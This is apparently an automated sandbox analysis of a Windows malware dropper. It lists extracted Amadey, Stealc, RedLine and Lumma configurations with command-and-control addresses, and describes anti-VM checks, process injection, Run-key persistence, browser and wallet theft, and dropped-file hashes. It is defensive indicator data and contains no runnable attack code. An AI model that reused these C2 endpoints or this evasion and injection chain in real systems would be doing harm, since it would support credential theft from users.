Analysis
max time kernel: 300s
max time network: 293s
platform: windows10-1703_x64
resource: win10-20240404-en
resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
submitted: 01-07-2024 05:07
Static task: static1
Behavioral task: behavioral1
Sample: bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe
Resource: win7-20240508-en
General
Target: bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe
Size: 1.9MB
MD5: eaa443f37443cb7221d63e0891243384
SHA1: d3242326b2ac1ae6e9817a49df33c3a79e209aee
SHA256: bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13
SHA512: 8405c44c1eea8578224eb6495f689d66e4e2f6503c0bf08d3c111e4e307603a35089649296ebf89b76d339c9517a83133b741c655097a9fe319f25aae1f6afdb
SSDEEP: 49152:6YyPZ96v5ohNyPiYPl5A7E2+P75+Zg6RenX1IAhTiz8wPT:kBSPiYNK7mP91/TOQ
Malware Config
Extracted: amadey
  8254624243
  e76b71
  http://77.91.77.81
  install_dir: 8254624243
  install_file: axplong.exe
  strings_key: 90049e51fabf09df0d6748e0b271922e
  url_paths: /Kiru9gu/index.php
Extracted: stealc
  jopa
  http://65.21.175.0
  url_path: /108e010e8f91c38c.php
Extracted: redline
  LiveTraffoc
  4.185.56.82:42687
Extracted: redline
  newlogs
  85.28.47.7:17210
Extracted: stealc
  ZOV
  http://40.86.87.10
  url_path: /108e010e8f91c38c.php
Extracted: redline
  newbuild
  185.215.113.67:40960
Extracted: lumma
  https://groundsmooors.shop/api
  https://potterryisiw.shop/api
  https://foodypannyjsud.shop/api
  https://contintnetksows.shop/api
  https://reinforcedirectorywd.shop/api
Signatures
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine payload [5 IoCs]
  resource | yara_rule
  behavioral2/memory/3356-127-0x0000000000400000-0x0000000000450000-memory.dmp | family_redline
  C:\Users\Admin\AppData\Local\Temp\1000130001\newlogs.exe | family_redline
  behavioral2/memory/4272-148-0x0000000000AE0000-0x0000000000B30000-memory.dmp | family_redline
  C:\Users\Admin\AppData\Local\Temp\1000132001\newbuild.exe | family_redline
  behavioral2/memory/4908-198-0x00000000004E0000-0x0000000000530000-memory.dmp | family_redline

Identifies VirtualBox via ACPI registry values (likely anti-VM) [2 TTPs, 6 IoCs]
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplong.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplong.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplong.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplong.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplong.exe

Downloads MZ/PE file

Checks BIOS information in registry [2 TTPs, 12 IoCs]
BIOS information is often read in order to detect sandboxing environments.
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplong.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplong.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplong.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplong.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplong.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplong.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplong.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplong.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplong.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplong.exe

Executes dropped EXE [22 IoCs]
  pid | process
  4036 | axplong.exe
  1756 | streamer.exe
  2244 | TpWWMUpe0LEV.exe
  4400 | Freshbuild.exe
  2288 | crypt6.exe
  4976 | Hkbsse.exe
  4272 | newlogs.exe
  4408 | stealc_zov.exe
  4088 | 1.exe
  4908 | newbuild.exe
  4668 | realtekdriver.exe
  5364 | Hkbsse.exe
  6064 | axplong.exe
  5852 | realtekdriver.exe
  1688 | Hkbsse.exe
  64 | axplong.exe
  5928 | axplong.exe
  5244 | Hkbsse.exe
  816 | Hkbsse.exe
  1628 | axplong.exe
  5776 | axplong.exe
  5820 | Hkbsse.exe
Identifies Wine through registry keys [2 TTPs, 6 IoCs]
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
  description | ioc | process
  Key opened | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Wine | bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe
  Key opened | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Wine | axplong.exe
  Key opened | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Wine | axplong.exe
  Key opened | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Wine | axplong.exe
  Key opened | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Wine | axplong.exe
  Key opened | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Wine | axplong.exe
Loads dropped DLL [1 IoC]
  pid | process
  2244 | TpWWMUpe0LEV.exe

Reads user/profile data of web browsers [2 TTPs]
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting [2 TTPs]

Adds Run key to start application [2 TTPs, 1 IoC]
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\ScannerService = "C:\\Users\\Admin\\AppData\\Roaming\\ScannerService.exe" | realtekdriver.exe

Checks installed software on the system [1 TTPs]
Looks up Uninstall key entries in the registry to enumerate software on the system.

Legitimate hosting services abused for malware hosting/C2 [1 TTPs, 2 IoCs]

Suspicious use of NtSetInformationThreadHideFromDebugger [6 IoCs]
  pid | process
  2272 | bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe
  4036 | axplong.exe
  6064 | axplong.exe
  64 | axplong.exe
  5928 | axplong.exe
  1628 | axplong.exe

Suspicious use of SetThreadContext [4 IoCs]
  description | pid | process | target process
  PID 2244 set thread context of 924 | 2244 | TpWWMUpe0LEV.exe | aspnet_regiis.exe
  PID 2288 set thread context of 3356 | 2288 | crypt6.exe | RegAsm.exe
  PID 1756 set thread context of 1688 | 1756 | streamer.exe | BitLockerToGo.exe
  PID 4668 set thread context of 5852 | 4668 | realtekdriver.exe | realtekdriver.exe

Drops file in Windows directory [3 IoCs]
  description | ioc | process
  File created | C:\Windows\Tasks\axplong.job | bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe
  File created | C:\Windows\Tasks\Hkbsse.job | Freshbuild.exe
  File created | C:\Windows\Tasks\Test Task17.job | realtekdriver.exe

Enumerates physical storage devices [1 TTPs]
Attempts to interact with connected storage/optical drive(s).

Program crash [3 IoCs]
  pid | pid_target | process | target process
  1224 | 2288 | WerFault.exe | crypt6.exe
  220 | 4088 | WerFault.exe | 1.exe
  5624 | 924 | WerFault.exe | aspnet_regiis.exe

Checks SCSI registry key(s) [3 TTPs, 3 IoCs]
SCSI information is often read in order to detect sandboxing environments.
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 1.exe
  Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 1.exe
  Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 1.exe

Checks processor information in registry [2 TTPs, 2 IoCs]
Processor information is often read in order to detect sandboxing environments.
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | aspnet_regiis.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | aspnet_regiis.exe

Suspicious behavior: EnumeratesProcesses [21 IoCs]
  pid | process
  2272 | bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe
  2272 | bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe
  4036 | axplong.exe
  4036 | axplong.exe
  3356 | RegAsm.exe
  3356 | RegAsm.exe
  3356 | RegAsm.exe
  3356 | RegAsm.exe
  6064 | axplong.exe
  6064 | axplong.exe
  5708 | powershell.exe
  5708 | powershell.exe
  5708 | powershell.exe
  924 | aspnet_regiis.exe
  924 | aspnet_regiis.exe
  64 | axplong.exe
  64 | axplong.exe
  5928 | axplong.exe
  5928 | axplong.exe
  1628 | axplong.exe
  1628 | axplong.exe

Suspicious use of AdjustPrivilegeToken [4 IoCs]
  description | pid | process
  Token: SeDebugPrivilege | 4668 | realtekdriver.exe
  Token: SeDebugPrivilege | 3356 | RegAsm.exe
  Token: SeDebugPrivilege | 4668 | realtekdriver.exe
  Token: SeDebugPrivilege | 5708 | powershell.exe

Suspicious use of WriteProcessMemory [64 IoCs]
  description | pid | process | target process
  PID 2272 wrote to memory of 4036 | 2272 | bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe | axplong.exe
  PID 2272 wrote to memory of 4036 | 2272 | bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe | axplong.exe
  PID 2272 wrote to memory of 4036 | 2272 | bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe | axplong.exe
  PID 4036 wrote to memory of 1756 | 4036 | axplong.exe | streamer.exe
  PID 4036 wrote to memory of 1756 | 4036 | axplong.exe | streamer.exe
  PID 4036 wrote to memory of 2244 | 4036 | axplong.exe | TpWWMUpe0LEV.exe
  PID 4036 wrote to memory of 2244 | 4036 | axplong.exe | TpWWMUpe0LEV.exe
  PID 4036 wrote to memory of 2244 | 4036 | axplong.exe | TpWWMUpe0LEV.exe
  PID 2244 wrote to memory of 924 | 2244 | TpWWMUpe0LEV.exe | aspnet_regiis.exe
  PID 2244 wrote to memory of 924 | 2244 | TpWWMUpe0LEV.exe | aspnet_regiis.exe
  PID 2244 wrote to memory of 924 | 2244 | TpWWMUpe0LEV.exe | aspnet_regiis.exe
  PID 2244 wrote to memory of 924 | 2244 | TpWWMUpe0LEV.exe | aspnet_regiis.exe
  PID 2244 wrote to memory of 924 | 2244 | TpWWMUpe0LEV.exe | aspnet_regiis.exe
  PID 2244 wrote to memory of 924 | 2244 | TpWWMUpe0LEV.exe | aspnet_regiis.exe
  PID 2244 wrote to memory of 924 | 2244 | TpWWMUpe0LEV.exe | aspnet_regiis.exe
  PID 2244 wrote to memory of 924 | 2244 | TpWWMUpe0LEV.exe | aspnet_regiis.exe
  PID 2244 wrote to memory of 924 | 2244 | TpWWMUpe0LEV.exe | aspnet_regiis.exe
  PID 4036 wrote to memory of 4400 | 4036 | axplong.exe | Freshbuild.exe
  PID 4036 wrote to memory of 4400 | 4036 | axplong.exe | Freshbuild.exe
  PID 4036 wrote to memory of 4400 | 4036 | axplong.exe | Freshbuild.exe
  PID 4036 wrote to memory of 2288 | 4036 | axplong.exe | crypt6.exe
  PID 4036 wrote to memory of 2288 | 4036 | axplong.exe | crypt6.exe
  PID 4036 wrote to memory of 2288 | 4036 | axplong.exe | crypt6.exe
  PID 4400 wrote to memory of 4976 | 4400 | Freshbuild.exe | Hkbsse.exe
  PID 4400 wrote to memory of 4976 | 4400 | Freshbuild.exe | Hkbsse.exe
  PID 4400 wrote to memory of 4976 | 4400 | Freshbuild.exe | Hkbsse.exe
  PID 2288 wrote to memory of 3092 | 2288 | crypt6.exe | RegAsm.exe
  PID 2288 wrote to memory of 3092 | 2288 | crypt6.exe | RegAsm.exe
  PID 2288 wrote to memory of 3092 | 2288 | crypt6.exe | RegAsm.exe
  PID 2288 wrote to memory of 3368 | 2288 | crypt6.exe | RegAsm.exe
  PID 2288 wrote to memory of 3368 | 2288 | crypt6.exe | RegAsm.exe
  PID 2288 wrote to memory of 3368 | 2288 | crypt6.exe | RegAsm.exe
  PID 2288 wrote to memory of 4208 | 2288 | crypt6.exe | RegAsm.exe
  PID 2288 wrote to memory of 4208 | 2288 | crypt6.exe | RegAsm.exe
  PID 2288 wrote to memory of 4208 | 2288 | crypt6.exe | RegAsm.exe
  PID 2288 wrote to memory of 5100 | 2288 | crypt6.exe | RegAsm.exe
  PID 2288 wrote to memory of 5100 | 2288 | crypt6.exe | RegAsm.exe
  PID 2288 wrote to memory of 5100 | 2288 | crypt6.exe | RegAsm.exe
  PID 2288 wrote to memory of 3356 | 2288 | crypt6.exe | RegAsm.exe
  PID 2288 wrote to memory of 3356 | 2288 | crypt6.exe | RegAsm.exe
  PID 2288 wrote to memory of 3356 | 2288 | crypt6.exe | RegAsm.exe
  PID 2288 wrote to memory of 3356 | 2288 | crypt6.exe | RegAsm.exe
  PID 2288 wrote to memory of 3356 | 2288 | crypt6.exe | RegAsm.exe
  PID 2288 wrote to memory of 3356 | 2288 | crypt6.exe | RegAsm.exe
  PID 2288 wrote to memory of 3356 | 2288 | crypt6.exe | RegAsm.exe
  PID 2288 wrote to memory of 3356 | 2288 | crypt6.exe | RegAsm.exe
  PID 4036 wrote to memory of 4272 | 4036 | axplong.exe | newlogs.exe
  PID 4036 wrote to memory of 4272 | 4036 | axplong.exe | newlogs.exe
  PID 4036 wrote to memory of 4272 | 4036 | axplong.exe | newlogs.exe
  PID 4036 wrote to memory of 4408 | 4036 | axplong.exe | stealc_zov.exe
  PID 4036 wrote to memory of 4408 | 4036 | axplong.exe | stealc_zov.exe
  PID 4036 wrote to memory of 4408 | 4036 | axplong.exe | stealc_zov.exe
  PID 4976 wrote to memory of 4088 | 4976 | Hkbsse.exe | 1.exe
  PID 4976 wrote to memory of 4088 | 4976 | Hkbsse.exe | 1.exe
  PID 4976 wrote to memory of 4088 | 4976 | Hkbsse.exe | 1.exe
  PID 4036 wrote to memory of 4908 | 4036 | axplong.exe | newbuild.exe
  PID 4036 wrote to memory of 4908 | 4036 | axplong.exe | newbuild.exe
  PID 4036 wrote to memory of 4908 | 4036 | axplong.exe | newbuild.exe
  PID 4036 wrote to memory of 4668 | 4036 | axplong.exe | realtekdriver.exe
  PID 4036 wrote to memory of 4668 | 4036 | axplong.exe | realtekdriver.exe
  PID 4036 wrote to memory of 4668 | 4036 | axplong.exe | realtekdriver.exe
  PID 1756 wrote to memory of 1688 | 1756 | streamer.exe | BitLockerToGo.exe
  PID 1756 wrote to memory of 1688 | 1756 | streamer.exe | BitLockerToGo.exe
  PID 1756 wrote to memory of 1688 | 1756 | streamer.exe | BitLockerToGo.exe
Processes
Process tree (indentation shows parent/child nesting; each entry lists the image path, the command line, and the signatures that matched on it):

C:\Users\Admin\AppData\Local\Temp\bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\1000111001\streamer.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\1000111001\streamer.exe"
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious use of WriteProcessMemory
      C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        command line: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Users\Admin\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of SetThreadContext
      - Suspicious use of WriteProcessMemory
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
        command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
        - Checks processor information in registry
        - Suspicious behavior: EnumeratesProcesses
        C:\Windows\SysWOW64\WerFault.exe
          command line: C:\Windows\SysWOW64\WerFault.exe -u -p 924 -s 1116
          - Program crash
    C:\Users\Admin\AppData\Local\Temp\1000125001\Freshbuild.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\1000125001\Freshbuild.exe"
      - Executes dropped EXE
      - Drops file in Windows directory
      - Suspicious use of WriteProcessMemory
      C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
        C:\Users\Admin\AppData\Local\Temp\1000028001\1.exe
          command line: "C:\Users\Admin\AppData\Local\Temp\1000028001\1.exe"
          - Executes dropped EXE
          - Checks SCSI registry key(s)
          C:\Windows\SysWOW64\WerFault.exe
            command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 504
            - Program crash
    C:\Users\Admin\AppData\Local\Temp\1000128001\crypt6.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\1000128001\crypt6.exe"
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious use of WriteProcessMemory
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\SysWOW64\WerFault.exe
        command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 352
        - Program crash
    C:\Users\Admin\AppData\Local\Temp\1000130001\newlogs.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\1000130001\newlogs.exe"
      - Executes dropped EXE
    C:\Users\Admin\AppData\Local\Temp\1000131001\stealc_zov.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\1000131001\stealc_zov.exe"
      - Executes dropped EXE
    C:\Users\Admin\AppData\Local\Temp\1000132001\newbuild.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\1000132001\newbuild.exe"
      - Executes dropped EXE
    C:\Users\Admin\AppData\Local\Temp\1000135001\realtekdriver.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\1000135001\realtekdriver.exe"
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious use of SetThreadContext
      - Suspicious use of AdjustPrivilegeToken
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc <encoded argument omitted>
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      C:\Users\Admin\AppData\Local\Temp\1000135001\realtekdriver.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\1000135001\realtekdriver.exe"
        - Executes dropped EXE
        - Drops file in Windows directory

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  command line: C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses

C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  command line: C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  - Executes dropped EXE

C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  command line: C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  - Executes dropped EXE

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  command line: C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  command line: C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses

C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  command line: C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  - Executes dropped EXE

C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  command line: C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  - Executes dropped EXE

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  command line: C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  command line: C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  - Executes dropped EXE

C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  command line: C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  - Executes dropped EXE
Downloads
C:\Users\Admin\AppData\Local\Temp\1000028001\1.exe
  Filesize: 240KB
  MD5: b5b04a1ea6d55d9b62d90de0d89a0199
  SHA1: 567cb7d6182173e4a00356bd7d770c2625cfc0f5
  SHA256: 5c14b695450b36c84924c067f8e38374ca05d814293d26ca2e0d0ac02ec4eaa8
  SHA512: d398d441e71bf1176a12e8834674d3c19e95c29824ffc718acb4bc114d7318b7bc6d859dd60710062150142afa4336acd8fbb5c5a600465c4799b833cc9bacef

C:\Users\Admin\AppData\Local\Temp\1000111001\streamer.exe
  Filesize: 6.2MB
  MD5: b9265c31743db2e9698a08df7b0c5e9d
  SHA1: aa01367b13f827a5773d0781692809ae175bc718
  SHA256: b2a10d42ed9b902a6a4a40b47da8448c9fa61f268f3ffb37d08bd5f5e213a0af
  SHA512: 1678d62ad17ce27394599f2835f3c1f209f544fdfae4c54034e7da06936768fe487a55811d9f0919018113af50153437ea0631968814910db69df0ffda36a133

C:\Users\Admin\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe
  Filesize: 1.2MB
  MD5: 242214131486132e33ceda794d66ca1f
  SHA1: 4ce34fd91f5c9e35b8694007b286635663ef9bf2
  SHA256: bac402b5749b2da2211db6d2404c1c621ccd0c2e5d492eb6f973b3e2d38dd361
  SHA512: 031e0904d949cec515f2d6f2b5e4b9c0df03637787ff14f20c58e711c54eec77d1f22aa0cf0f6efd65362c1fc0066645d5d005c6a77fe5b169427cdd42555d29

C:\Users\Admin\AppData\Local\Temp\1000115001\build.exe
  Filesize: 26KB
  MD5: b7d2c1f174eefb2691c5e9e54646bcf8
  SHA1: a1426c9956551085b76f8480efa9213c1f445e25
  SHA256: d945daff39e54640dba27324fa0472c25e1a0ca8bffdf4b31c499aa3bc88a1e2
  SHA512: ca7616c052d72b4e1a750ce2996f7c5ce49193307d83e3aeab30c996306c90d7127cde9c4c7ce1151a01f32aff02bac45a90b218ae5b1b783e5b4b1e347ac32d

C:\Users\Admin\AppData\Local\Temp\1000116001\FILE1.exe
  Filesize: 26KB
  MD5: a8bc178b9c6b03fbdea6d742e11ea3ae
  SHA1: 6090087f5a820a2b269b780482a00bd63edbce68
  SHA256: 248ce8ab3da7891872b69e45c61c6cb563f0b7598089e4a3e09f0b70be38418f
  SHA512: a5345fd8c8446f60703baa6348311fb35a9d98b11fad5f39ba5142362d2e44a7ab4bd34834ebdf12d7d3eeb92cb425df717387612cd2ae005f13598cb1d02840

C:\Users\Admin\AppData\Local\Temp\1000125001\Freshbuild.exe
  Filesize: 415KB
  MD5: 07101cac5b9477ba636cd8ca7b9932cb
  SHA1: 59ea7fd9ae6ded8c1b7240a4bf9399b4eb3849f1
  SHA256: 488385cd54d14790b03fa7c7dc997ebea3f7b2a8499e5927eb437a3791102a77
  SHA512: 02240ff51a74966bc31cfcc901105096eb871f588efaa9be1a829b4ee6f245bd9dca37be7e2946ba6315feea75c3dce5f490847250e62081445cd25b0f406887

C:\Users\Admin\AppData\Local\Temp\1000128001\crypt6.exe
  Filesize: 512KB
  MD5: a957dc16d684fbd7e12fc87e8ee12fea
  SHA1: 20c73ccfdba13fd9b79c9e02432be39e48e4b37d
  SHA256: 071b6c448d2546dea8caed872fca0d002f59a6b9849f0de2a565fc74b487fa37
  SHA512: fd6982587fba779d6febb84dfa65ec3e048e17733c2f01b61996bedb170bb4bb1cbb822c0dd2cf44a7e601373abaf499885b13b7957dd2a307bbd8f2120e9b3b

C:\Users\Admin\AppData\Local\Temp\1000130001\newlogs.exe
  Filesize: 297KB
  MD5: 0970456d2e2bcb36f49d23f5f2eec4ce
  SHA1: 1e427bbeb209b636371d17801b14fabff87921be
  SHA256: 264db4d677606c95912a93a457675d5ebaa24dc886da8bbcb800fe831c540a54
  SHA512: 43c233e6c6fb20ee5830672f68eec2a1930aff6c3da185b7af56ede90970041157755b8893a86336711c8ba8cbe3f22818de8ddc1789ed65a7aacd596771909e

C:\Users\Admin\AppData\Local\Temp\1000131001\stealc_zov.exe
  Filesize: 158KB
  MD5: 253ccac8a47b80287f651987c0c779ea
  SHA1: 11db405849dbaa9b3759de921835df20fab35bc3
  SHA256: 262a400b339deea5089433709ce559d23253e23d23c07595b515755114147e2f
  SHA512: af40e01bc3d36baf47eba1d5d6406220dfbcc52c6123dd8450e709fed3e72bed82aac6257fa7bdf7dd774f182919a5051e9712b2e7f1329defd0b159cb08385d

C:\Users\Admin\AppData\Local\Temp\1000132001\newbuild.exe
  Filesize: 297KB
  MD5: 9ab4de8b2f2b99f009d32aa790cd091b
  SHA1: a86b16ee4676850bac14c50ee698a39454d0231e
  SHA256: 8a254344702dc6560312a8028e08f844b16804b1fbf4c438c3ca5058d7b65ea1
  SHA512: a79341ec3407529daa0384de4cac25b665d3b0cb81e52ecada0ebfe37d7616b16da96b47b04f50ce0a6e46d5fced3298a459f78a087c6b6eac4ed444434c5fbe

C:\Users\Admin\AppData\Local\Temp\1000135001\realtekdriver.exe
  Filesize: 2.1MB
  MD5: 662404ed188bfab5386fc73a0a7732d4
  SHA1: 79ccf9c9015384fe6d7b0245720a2a59a27cebfb
  SHA256: 601c31115b7c8db7e45d8a4386252f8b4a09d49b7d55eb25c9c49932828d718c
  SHA512: ae90c377177528db849026192e93b0558e0ea5e84953b61e591910c69d2453f5fb73cc431853531bbf6a5c33e2a711620ca6e8e6f061eab7f93f5a8f1caf46d7

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  Filesize: 1.9MB
  MD5: eaa443f37443cb7221d63e0891243384
  SHA1: d3242326b2ac1ae6e9817a49df33c3a79e209aee
  SHA256: bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13
  SHA512: 8405c44c1eea8578224eb6495f689d66e4e2f6503c0bf08d3c111e4e307603a35089649296ebf89b76d339c9517a83133b741c655097a9fe319f25aae1f6afdb

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jafjjtuv.faa.ps1
  Filesize: 1B
